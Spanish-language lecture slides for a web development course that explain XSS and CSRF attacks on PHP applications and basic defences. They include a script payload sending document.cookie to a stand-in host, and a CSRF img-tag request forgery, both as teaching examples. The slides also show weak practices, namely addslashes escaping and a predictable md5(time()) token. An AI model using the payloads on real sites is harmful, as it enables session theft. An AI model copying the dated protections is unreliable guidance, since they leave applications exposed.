CI-2413 Desarrollo de Aplicaciones para Internet Ataques XSS y CSRF CI-2413 Desarrollo de Aplicaciones para Internet

Seguridad Podremos hablar de aplicaciones web seguras y inseguras. Por definición una aplicación web segura es aquella que es 100% invulnerable a cualquier tipo de ataque. Sobre esta base se pueden considerar las aplicaciones web como inseguras. Se verá protección contra dos tipos de ataques.

Cross-Site Scripting (XSS) El error fundamental que conduce a vulnerabilidades de tipo XSS es tener confianza en los datos foráneos. La recomendación general es desconfiar siempre de los datos del visitante. Como datos foráneos vamos a considerar cualquier dato que reciba el servidor web. V.G.: correo emitido por un cliente de correo web, un banner publicitario, las citas proveidas por XML vía HTTP, los datos del visitante, ...

Ejemplo de XSS Considere el siguiente formulario: <form action="/registrar.php" method="post"> <p>Nombre de usuario: <input type="text" name="reg_usuario" /></p> <p>Email: <input type="text" name="reg_email" /></p> <p><input type="submit" value="Registrar" /> </form>

Ejemplo de XSS Ahora considere el siguiente script de inserción de los datos: if (!get_magic_quotes_gpc()) { $_POST['reg_usuario'] = addslashes($_POST['reg_usuario']); $_POST['reg_email'] = addslashes($_POST['reg_email']); } $sql = "insert into users (username, email) values ('{$_POST['reg_usuario ']}', '{$_POST['reg_email']}')";

Ejemplo de XSS Imagine el siguiente nombre de usuario: <script>alert('¡Oh no!');</script> Se puede determinar fácilmente que el código anterior no es nombre de usuario válido, lo cual demuestra que el código que escribimos no es siempre prudente. Por supuesto, el peligro de XSS reside en el efecto producido cuando los datos son reenviados a otros utilizadores.

Ejemplo de XSS Despligue por un administrador: <table> <th>Usuario</th> <th>Email</th> </tr> <?php if ($_SESSION['admin']) { $sql = 'select username,email from users'; $result = mysql_query($sql); while ($user = mysql_fetch_assoc($result)) { echo "\t<tr>\n"; echo "\t\t<td>{$user['username']}</td>\n"; echo "\t\t<td>{$user['email']}</td>\n"; echo "\t</tr>\n"; } ?> </table>

Ejemplo de XSS En el ejemplo anterior si los datos no son validados antes de ser guardados, el administrador podrá ser sujeto de un ataque XSS.

Ejemplo de XSS El riesgo es aún más evidente con algún ataque más vicioso como el siguiente: <script> document.location = 'http://maligno.ejemplo.org/roba_cookies.php?cookies=' + document.cookie </script> En este ejemplo, el script distante roba_cookies.php puede acceder a los cookies con la variable $_GET['cookies']. Un vez capturados los cookies pueden ser utilizados para lanzar ataques de usurpación de identidad, obtener datos sensibles, etc.

Protegerse contra XSS Filtrar todos los datos foráneos. Utilizar la funcionalidad existente: htmlentities(), strip_tags, utf8_decode(), etc. pueden ayudar a escribir la lógica de filtrado. Solamente autorizar un contenido validado. Utilizar una convención de nombres descriptiva. Ser creativo.

Cross-Site Request Forgeries (CSRF) Este tipo de ataques en lugar de explotar la confianza del usuario explotan la confianza que hace el sitio web a sus usuarios. CSRF implica la simulación de solicitudes HTTP, por lo cual es muy importante entender las solicitudes HTTP.

Ejemplo de CSRF Considere un foro hipotético en http://foro.ejemplo.org/ que utiliza el siguiente formulario: <form action="/add_post.php"> <p>Asunto: <input type="text" name="post_subject" /></p> <p>Mensaje: <textarea name="post_message"></textarea></p> <p><input type="submit" value="Enviar" /></p> </form>

Ejemplo de CSRF Dado que en el código anterior no se indicó POST una solicitud GET es enviada: GET /add_post.php?post_subject=foo&post_message=bar HTTP/1.1 HOST: foro.ejemplo.org Cookie: PHPSESSID=123456789

Ejemplo de CSRF Considere la etiqueta <img> siguiente: <img src="http://foro.ejemplo.org/add_post.php?post_subject=foo&post_message=bar” /> Cuando un navegador pida esta imagen va a enviar exactamente la misma solicitud de la filmina anterior. La víctima va a enviar un mensaje en el foro y sin darse cuenta.

Protegerse contra CSRF Utilizar el método POST en los formularios. Utilizar el arreglo $_POST en lugar de las variables creadas gracias a register_globals. No simplificar las acciones importantes. Obligar al usuario a utilizar nuestros formularios HTML.

Protegerse contra CSRF Un ejemplo de técnica para obligar al usuario a utilizar nuestros propios formularios es la siguiente: <?php $token = md5(time()); $_SESSION['token'] = $token; $_SESSION['token_timestamp'] = time(); ?> <form action="/add_post.php"> <input type="hidden" name="token" value="<?php echo $token; ?>" /> <p>Asunto: <input type="text" name="post_subject" /></p> <p>Mensaje: <textarea name="post_message"></textarea></p> <p><input type="submit" value="Enviar" /></p> </form>

Lecturas adicionales PHP Under Attaque: presentación sobre XSS y CSRF http://talks.php.net/show/php-under-attack/ XSS http://httpd.apache.org/info/css-security/ http://www.cgisecurity.com/articles/xss-faq.shtml http://www.php-secure.info/v2/article/XSS.php CSRF http://www.tux.org/~peterw/csrf.txt

Proyecto de seguridad XSS: HTMLfilter es un proyecto para PHP que analiza todos los datos HTTP antes de ser utilizados.